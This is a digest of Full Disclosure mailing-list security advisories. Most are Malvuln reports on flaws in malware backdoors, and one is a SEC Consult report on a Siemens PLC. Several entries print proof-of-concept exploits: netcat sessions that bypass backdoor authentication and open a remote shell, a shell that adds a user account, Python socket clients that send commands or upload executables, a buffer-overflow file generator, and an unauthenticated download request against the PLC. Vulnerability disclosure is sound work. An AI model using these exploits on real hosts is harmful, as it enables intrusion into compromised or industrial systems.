[FD] Adversary3 v1.0 / Malware vulnerability intel tool for third-party attackers / updated
Adversary3 has been updated with a bunch of new malware vulnz. https://github.com/malvuln/Adversary3 Thanks, Malvuln (aka hyp3rlinx) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Email-Worm.Win32.Pluto.b / Insecure Permissions
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/60a7d5e2d446110d84ef65f6a37af0eb.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Email-Worm.Win32.Pluto.b Vulnerability: Insecure Permissions Description: The malware writes a dir and PE files with insecure permissions to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: Pluto Type: PE32 MD5: 60a7d5e2d446110d84ef65f6a37af0eb Vuln ID: MVID-2022-0547 Disclosure: 04/14/2022 Exploit/PoC: C:\>cacls "My Downloads" C:\My Downloads BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C C:\>dir "My Downloads" Volume in drive C has no label. Directory of C:\My Downloads 02/18/2013 04:39 PM34,816 Age Of Empires 2 Key Generator.exe 02/18/2013 04:39 PM34,816 AikaQuest3Hentai Key Generator.exe 02/18/2013 04:39 PM34,816 AIM Account Stealer ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Battle.net Crack.exe 02/18/2013 04:39 PM34,816 Black And White ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Civilization 3 Crack.exe 02/18/2013 04:39 PM34,816 Civilization 3 Full Downloader.exe 02/18/2013 04:39 PM34,816 Comanche 4 Full Downloader.exe 02/18/2013 04:39 PM34,816 Comanche 4 ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Combat Flight Simulator 3 Full Downloader.exe 02/18/2013 04:39 PM34,816 Critical Point Manga game Full Downloader.exe 02/18/2013 04:39 PM34,816 Critical Point Manga game Patch.exe 02/18/2013 04:39 PM34,816 Dark Age Of Camelot Shrouded Isles Crack.exe 02/18/2013 04:39 PM34,816 Dark Age Of Camelot Shrouded Isles Patch.exe 02/18/2013 04:39 PM34,816 Deadly Dozen Key Generator.exe 02/18/2013 04:39 PM34,816 Emperor Rise Of the Middle Kingdom Full Downloader.exe 02/18/2013 04:39 PM34,816 Empire Earth ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 F1 Grand Pix 4 Patch.exe 02/18/2013 04:39 PM34,816 Free Virus Removal Tool From Symantec Full Downloader.exe 02/18/2013 04:39 PM34,816 Gladiator Full Downloader.exe 02/18/2013 04:39 PM34,816 Gladiator ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Grand Prix 4 ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Grand Theft Auto 3 Key Generator.exe 02/18/2013 04:39 PM34,816 GTA3 ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Half Life Blue Shift ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Hard Truck 18 Wheels of Steel Crack.exe 02/18/2013 04:39 PM34,816 Industry Giant 2 Crack.exe 02/18/2013 04:39 PM34,816 International Cricket Captain 2003 Full Downloader.exe 02/18/2013 04:39 PM34,816 KaZaA Spyware Remover Crack.exe 02/18/2013 04:39 PM34,816 Macromedia Flash 5.0 Patch.exe 02/18/2013 04:39 PM34,816 Microsoft Office XP (English) Key Generator.exe 02/18/2013 04:39 PM34,816 MoviezChannelsInstaler ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 MS Train Simulator Crack.exe 02/18/2013 04:39 PM34,816 Prisoner Of War ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Prisoner Of War Patch.exe 02/18/2013 04:39 PM34,816 Quake 4 BETA ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 SIMS Full Downloader.exe 02/18/2013 04:39 PM34,816 SIMS ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Soldiers Of Anarchy ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Star Wars II Movie Key Generator.exe 02/18/2013 04:39 PM34,816 Strike Fighter Project 1 Patch.exe 02/18/2013 04:39 PM34,816 Stronghold Crusader Crack.exe 02/18/2013 04:39 PM34,816 Sudden Strike 2 Key Generator.exe 02/18/2013 04:39 PM34,816 The Thing Full Downloader.exe 02/18/2013 04:39 PM34,816 The Thing Key Generator.exe 02/18/2013 04:39 PM34,816 Tomb Raider 3 Full Downloader.exe 02/18/2013 04:39 PM34,816 Warcraft 3 ONLINE Crack.exe 02/18/2013 04:39 PM34,816 Windows XP Full Downloader.exe 02/18/2013 04:39 PM34,816 Windows XP ISO - Full Downloader.exe 02/18/2013 04:39 PM34,816 Zidane-ScreenInstaler Crack.exe 50 File(s) 1,740,800 bytes Disclaimer: The information
[FD] Backdoor.Win32.Kilo.016 / Denial of Service (UDP Datagram)
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/9ede6951ea527f96a785c5e32b5079e6.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Kilo.016 Vulnerability: Denial of Service (UDP Datagram) Description: The malware listens on TCP ports 6712, 6713, 6714, 6715, 7722, 15206, 15207, 16712 and UDP . Attackers who can reach an infected host can send a large payload to UDP port causing a disruption in service. Family: Kilo Type: PE32 MD5: 9ede6951ea527f96a785c5e32b5079e6 Vuln ID: MVID-2022-0546 Disclosure: 04/14/2022 Memory Dump: (1ab8.1368): Access violation - code c005 (first/second chance not available) eax=000a1078 ebx=000a1048 ecx=0047b094 edx=000a1078 esi=000a11a0 edi= eip=776e9fab esp=000a0fc8 ebp=000a100c iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212 ntdll!RtlAcquireSRWLockShared+0xb: 776e9fab 56 pushesi 0:000> !analyze -v *** * * *Exception Analysis * * * *** FAULTING_IP: KERNELBASE!RaiseException+62 74a108f2 8b4c2454mov ecx,dword ptr [esp+54h] EXCEPTION_RECORD: 0019f788 -- (.exr 0x19f788) ExceptionAddress: 74a108f2 (KERNELBASE!RaiseException+0x0062) ExceptionCode: 0eedfade ExceptionFlags: 0003 NumberParameters: 7 Parameter[0]: 00413c5f Parameter[1]: 06e39bb8 Parameter[2]: Parameter[3]: 004104f0 Parameter[4]: 042e2d94 Parameter[5]: 0019fd0c Parameter[6]: 0019fcc8 PROCESS_NAME: Backdoor.Win32.Kilo.016.9ede6951ea527f96a785c5e32b5079e6 ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 0001 EXCEPTION_PARAMETER2: 000a0fc4 WRITE_ADDRESS: 000a0fc4 FOLLOWUP_IP: KERNELBASE!RaiseException+0 74a10890 8bffmov edi,edi MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 CONTEXT: 0019f7d8 -- (.cxr 0x19f7d8) eax=0019fc38 ebx= ecx=0007 edx= esi=004104f0 edi=042e2d94 eip=74a108f2 esp=0019fc38 ebp=0019fc94 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0212 KERNELBASE!RaiseException+0x62: 74a108f2 8b4c2454mov ecx,dword ptr [esp+54h] ss:002b:0019fc8c=955c75b1 Resetting default scope ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] LAST_CONTROL_TRANSFER: from 0046ea76 to 74a108f2 FAULTING_THREAD: BUGCHECK_STR: APPLICATION_FAULT_INVALID_STACK_ACCESS_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_ PRIMARY_PROBLEM_CLASS: INVALID_STACK_ACCESS_EXPLOITABLE_FILL_PATTERN_ DEFAULT_BUCKET_ID: INVALID_STACK_ACCESS_EXPLOITABLE_FILL_PATTERN_ STACK_TEXT: 0019fc38 74a108f2 kernelbase!RaiseException+0x62 0019fd14 0046ea76 backdoor_win32_kilo_016+0x6ea76 0019fd6c 0046e995 backdoor_win32_kilo_016+0x6e995 0019fd88 7720e0bb user32!_InternalCallWinProc+0x2b 0019fdb4 77218849 user32!InternalCallWinProc+0x20 0019fdd8 7721b145 user32!UserCallWinProcCheckWow+0x1be 0019fea8 772090dc user32!DispatchMessageWorker+0x4ac 0019ff14 772038c0 user32!DispatchMessageA+0x10 0019ff1c 0044fc8c backdoor_win32_kilo_016+0x4fc8c 0019ff70 004d87b2 backdoor_win32_kilo_016+0xd87b2 0019ff88 77408654 kernel32!BaseThreadInitThunk+0x24 0019ff9c 77704a77 ntdll!__RtlUserThreadStart+0x2f 0019ffe4 77704a47 ntdll!_RtlUserThreadStart+0x1b SYMBOL_NAME: kernelbase!RaiseException+0 FOLLOWUP_NAME: MachineOwner MODULE_NAME: KERNELBASE IMAGE_NAME: KERNELBASE.dll DEBUG_FLR_IMAGE_TIMESTAMP: 0 STACK_COMMAND: .cxr 0019F7D8 ; kb ; dds 19fc38 ; kb FAILURE_BUCKET_ID: INVALID_STACK_ACCESS_EXPLOITABLE_FILL_PATTERN__c005_KERNELBASE.dll!RaiseException BUCKET_ID: APPLICATION_FAULT_INVALID_STACK_ACCESS_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN__kernelbase!RaiseException+0 Exploit/PoC: python -c "print('A'*3)" | nc64.exe x.x.x.x -c -u Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious
[FD] Backdoor.Win32.NinjaSpy.c / Authentication Bypass
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/9f39606d9e19771af5acc6811ccf557f.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.NinjaSpy.c Vulnerability: Authentication Bypass Description: The malware listens on TCP ports 2003, 2004 and drops a PE file named "cmd.dll" under Windows dir. Connecting to port 2003, you will get back a number "9951" from the infected host. If we send the value 1000 we get a message in Portugese "Pisca Pisca Ativado" translates to "Blink Blink Activated". If we connect to port 2004 and send "abc123" we get message "Acesso negado..." translates to "Access denied". However, if you take the initial number we received earlier (9951) when connecting to port 2003 and apply some calculation we expose hidden functionality. Take the 9951 value and invert the first two digits to 66 and then add together the last two 5 + 1 to equal 6 for a final value of "666". Example, initial number (9951) 99 inverted equals 66 and 5 + 1 = 6. Enter and send the constructed value of "666" to port 2003 and TCP port 999 is opened. Connect to port 999 and you get back a remote shell. Family: NinjaSpy Type: PE32 MD5: 9f39606d9e19771af5acc6811ccf557f Vuln ID: MVID-2022-0552 Disclosure: 04/14/2022 Exploit/PoC: C:\>nc64.exe x.x.x.x 2004 test Acesso negado...pwd C:\>nc64.exe x.x.x.x 2003 9952666 C:\>nc64.exe x.x.x.x 999 Microsoft Windows [Version 10.0.16299.309] (c) 2017 Microsoft Corporation. All rights reserved. C:\dump>whoami whoami desktop-2c3iqho\victim C:\dump>net user hyp3rlinx abc123 /add net user hyp3rlinx abc123 /add The command completed successfully. Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Backdoor.Win32.NetSpy.10 / Unauthenticated Remote Command Execution
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/45d413b46f1d14a45e8fd36921813d62.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.NetSpy.10 Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port 7306. Attackers who can reach infected hosts can run commands made available by the backdoor. Sending commands using Ncat and Telnet both fail with errors, probably don't like the linefeed chars, so need to write your own custom client. Example commands avail are put, mkd, exec and msg. Family: NetSpy Type: PE32 MD5: 45d413b46f1d14a45e8fd36921813d62 Vuln ID: MVID-2022-0551 Disclosure: 04/14/2022 Exploit/PoC: from socket import * import time MALWARE_HOST="x.x.x.x" PORT=7306 CMD="exec c:\\Windows\\system32\\calc.exe" def chk_res(s): res="" while True: res += s.recv(512) break if "\0" in res or "\n" in res or res == "": break return res def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) s.send(CMD) time.sleep(1) print(chk_res(s)) s.close() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Backdoor.Win32.NetCat32.10 / Unauthenticated Remote Command Execution
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/dcf16aed5ad4e0058a6cfcc7593dd9e3.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.NetCat32.10 Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP port . Attackers who can reach infected systems can run commands made available by the backdoor using TELNET. Family: NetCat32 Type: PE32 MD5: dcf16aed5ad4e0058a6cfcc7593dd9e3 Vuln ID: MVID-2022-0550 Disclosure: 04/14/2022 Exploit/PoC: telnet.exe x.x.x.x HELO HHEELLPP HELP This help EXIT Quit your session VER Get Versions ExitWin Shutdown Windows CLIP View Clipboard PASS Display Cached Pass DOWNLOAD Host download file GET Get file from host EXEC ShellExecute EXECHIDE ShellExecute SHOW Show WindowHIDE Hide Window MAXALL Max all WindowsMINALL Min all Windows RESTALL Restore WindowsLISTWIN List Windows DESK Set Desktop Color WALL Set Wallpaper MKDIRMake Directory RMDIRRemove Directory RM Delete FileMOVE Move / Rename File LS List Directory TELNET Connect another FUNCAP Rock the CapLock CDROMOpen/Close cdrom +OK EEXXEECC ccaallcc +OK Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] HackTool.Win32.IpcScan.c / Local Stack Buffer Overflow
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/8f44374d587eb1657d25da9628cb2b87.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: HackTool.Win32.IpcScan.c Vulnerability: Local Stack Buffer Overflow Description: Loading a specially crafted PE file will cause a stack buffer overflow overwriting the ECX and EIP registers. Family: IpcScan Type: PE32 MD5: 8f44374d587eb1657d25da9628cb2b87 Vuln ID: MVID-2022-0549 Disclosure: 04/14/2022 Memory Dump: (d60.c9c): Access violation - code c005 (first/second chance not available) eax= ebx= ecx=41414141 edx=77729d70 esi= edi= eip=41414141 esp=000a13f0 ebp=000a1410 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 41414141 ?? ??? 0:000> !analyze -v *** * * *Exception Analysis * * * *** *** WARNING: Unable to verify checksum for HackTool.Win32.IpcScan.c.8f44374d587eb1657d25da9628cb2b87.exe *** ERROR: Module load completed but symbols could not be loaded for HackTool.Win32.IpcScan.c.8f44374d587eb1657d25da9628cb2b87.exe Matched: 744f0021 msvcrt!ReadString (void) Matched: 744f4491 msvcrt!ReadString (void) Matched: 744faf90 msvcrt!ReadString (void) Matched: 744fbf79 msvcrt!ReadString (void) Matched: 744ffe60 msvcrt!ReadString (void) Matched: 745010d1 msvcrt!ReadString (void) Matched: 7450e2b4 msvcrt!ReadString (void) Matched: 7450f52e msvcrt!ReadString (void) Matched: 745119d4 msvcrt!ReadString (void) Matched: 74512d75 msvcrt!ReadString (void) FAULTING_IP: msvcrt!ReadString+12f 7450e3e3 8801mov byte ptr [ecx],al EXCEPTION_RECORD: 0019ec24 -- (.exr 0x19ec24) ExceptionAddress: 7450e3e3 (msvcrt!ReadString+0x012f) ExceptionCode: c005 (Access violation) ExceptionFlags: NumberParameters: 2 Parameter[0]: 0001 Parameter[1]: 001a Attempt to write to address 001a PROCESS_NAME: HackTool.Win32.IpcScan.c.8f44374d587eb1657d25da9628cb2b87.exe ERROR_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 0008 EXCEPTION_PARAMETER2: 41414141 WRITE_ADDRESS: 41414141 FOLLOWUP_IP: +12f 41414141 ?? ??? FAILED_INSTRUCTION_ADDRESS: +12f 41414141 ?? ??? MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 IP_ON_HEAP: 41414141 The fault address in not in any loaded module, please check your build's rebase log at \bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 41414141 CONTEXT: 0019ec74 -- (.cxr 0x19ec74) eax=0041 ebx=0020 ecx=001a edx=0019f18c esi=0019f15c edi=0019f180 eip=7450e3e3 esp=0019f0d4 ebp=0019f0f8 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 msvcrt!ReadString+0x12f: 7450e3e3 8801mov byte ptr [ecx],al ds:002b:001a=41 Resetting default scope ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] LAST_CONTROL_TRANSFER: from 7450f0b8 to 7450e3e3 FAULTING_THREAD: BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 STACK_TEXT: 0019f0d4 7450e3e3 msvcrt!ReadString+0x12f 0019f100 7450f0b8 msvcrt!_input_l+0xab8 0019f310 745030e0 msvcrt!vfscanf+0xe0 0019f358 74502fcb msvcrt!fscanf+0x1b 0019f374 00402b98 hacktool_win32_ipcscan_c+0x2b98 0019f380 0019f394 unknown!unknown+0x0 STACK_COMMAND: .cxr 0019EC74 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 19f0d4 ; kb SYMBOL_NAME: msvcrt!ReadString FOLLOWUP_NAME: MachineOwner MODULE_NAME: msvcrt IMAGE_NAME: msvcrt.dll DEBUG_FLR_IMAGE_TIMESTAMP: 692918b7 FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c005_msvcrt.dll!ReadString BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_msvcrt!ReadString Exploit/PoC: python -c "print('MZ'+'A'*1)" > DOOM.exe Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion
[FD] Backdoor.Win32.Psychward.03.a / Weak Hardcoded Password
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/d069738f18957117367b8a79195a6a96.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Psychward.03.a Vulnerability: Weak Hardcoded Password Description: The malware listens in TCP port 69. The password "tyme" is weak and stored in plaintext with the executable. Family: Psychward Type: PE32 MD5: d069738f18957117367b8a79195a6a96 Vuln ID: MVID-2022-0548 Dropped files: winvxd.exe Disclosure: 04/14/2022 Exploit/PoC: C:\>nc64.exe x.x.x.x 69 pwd tyme tyme psychward revised 0.3, awaiting your command Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Backdoor.Win32.Prorat.cwx / Insecure Permissions
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/2d81bf2c55c81778533b55fb444d4dc6.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Prorat.cwx Vulnerability: Insecure Permissions Description: The malware writes a ".EXE" file with insecure permissions to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: Prorat Type: PE32 MD5: 2d81bf2c55c81778533b55fb444d4dc6 Vuln ID: MVID-2022-0545 Disclosure: 04/14/2022 Exploit/PoC: C:\>cacls a.exe C:\a.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\dump>dir /a \a.exe Volume in drive C has no label. Directory of C:\ 04/08/2022 02:31 AM 368,609 a.exe 1 File(s)368,609 bytes Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Backdoor.Win32.MotivFTP.12 / Authentication Bypass
Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/91b2d216c5d26d9db4289acf68fa1743.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.MotivFTP.12 Vulnerability: Authentication Bypass Description: The malware listens on TCP port 21. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution. Family: MotivFTP Type: PE32 MD5: 91b2d216c5d26d9db4289acf68fa1743 Vuln ID: MVID-2022-0544 Disclosure: 04/14/2022 Exploit/PoC: C:\>nc64.exe 192.168.18.125 21 220 FTP Server ready USER malvuln 331 Password required for malvuln. PASS malvuln 230 User malvuln logged in. SYST 215 UNIX Type: L8 Internet Component Suite PASV CDUP \ 250 CWD command successful. "C:/" is current directory. PASV 227 Entering Passive Mode (192,168,18,125,194,25). STOR DOOM.exe 150 Opening data connection for DOOM.exe. 226 File received ok from socket import * import time HOST = "192.168.18.125" PORT = 49689 BUF_SIZE = 32 s=socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) with open("DOOM.exe", "rb") as f: while True: bytez = f.read(BUF_SIZE) if not bytez: break s.send(bytez) time.sleep(0.5) print("By malvuln") s.close() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] SEC Consult SA-20220413 :: Missing Authentication at File Download & Denial of Service in Siemens A8000 PLC
SEC Consult Vulnerability Lab Security Advisory < 20220413-0 > === title: Missing Authentication at File Download & Denial of Service product: Siemens A8000 CP-8050/CP-8031 SICAM WEB vulnerable version: < SICAM WEB Version 05.80 / < Firmware Package 04.80 fixed version: SICAM WEB V05.80 / Firmware Package 04.80 CVE number: CVE-2022-27480 impact: Medium homepage: https://www.siemens.com found: 2021-11-10 by: SEC Consult Vulnerability Lab This vulnerability was discovered during the research cooperation initiative "OT Cyber Security Lab" between Verbund AG and SEC Consult Group. Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Thomas Weber (Office Vienna) An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers. By combining the real and the digital worlds, we empower our customers to transform their industries and markets, helping them to transform the everyday for billions of people." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: Update to the current firmware in order to fix the missing authentication vulnerability. Siemens will not fix the denial of service vulnerability. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: --- 1) Missing Authentication at File Download (CVE-2022-27480) Several files that can be created by an authorized user are placed in the web server's root directory. The user can then download these files with a press on a UI button. However, the files are not deleted automatically after the user downloads them. The filenames are static and the download does not require any authentication. Therefore, they can be retrieved by anybody later. 2) Denial of Service Condition The PLC will stop responding to any connection attempts as soon as a light network load is placed on it. This effectively shuts down the management interfaces. Proof of concept: - 1) Missing Authentication at File Download (CVE-2022-27480) First, a file has to be created. This is possible by logging into SICAM Web. As an example, a network traffic capture can be created by navigating to "Monitoring & Simulation" -> "Ethernet Packet Capture". The following request shows how another client downloads the resulting wireshark.zip file without sending any authentication headers. - GET /wireshark.zip HTTP/1.1 Host: [IP] - The server responds with the created capture file: - HTTP/1.1 200 OK Content-Type: application/zip Accept-Ranges: bytes Cache-Control: max-age=0, private Content-Length: 370 Server: A8000 [...] PKÃV\S!ÃM>wireshark0.pcap [...] -- 2) Denial of Service Condition Putting a light network load on the PLC's interfaces causes a denial of service condition. In the tests it was enough to run a directory bruteforce with 5 threads in order to shut down all management interfaces. After the scan stopped, it took several minutes for the PLC to come back online. Vulnerable / tested versions: - The following product has been tested: * Siemens A8000 CP-8050 SICAM Web 05.50 Vendor contact timeline: 2022-02-07: Contacting vendor through productc...@siemens.com 2022-02-07: Siemens opened ticket, Issue 1 is already known for another product (CVE-2021-45034) 2022-02-09: Provided further information about the PLC version to Siemens 2022-02-10: Information forwarded to developers 2022-02-15: Siemens identified the right model, does not consider DoS as valid finding, as it does not stop the control loop from running and it is not an edge device 2022-03-22: Siemens asks to move disclosure date to their patch day on April 12th. SEC Consult agrees. Siemens now recognizes the DoS condition, but is accepting the risk and won't patch. 2022-03-28:
[FD] AST-2022-003: func_odbc: Possible SQL Injection
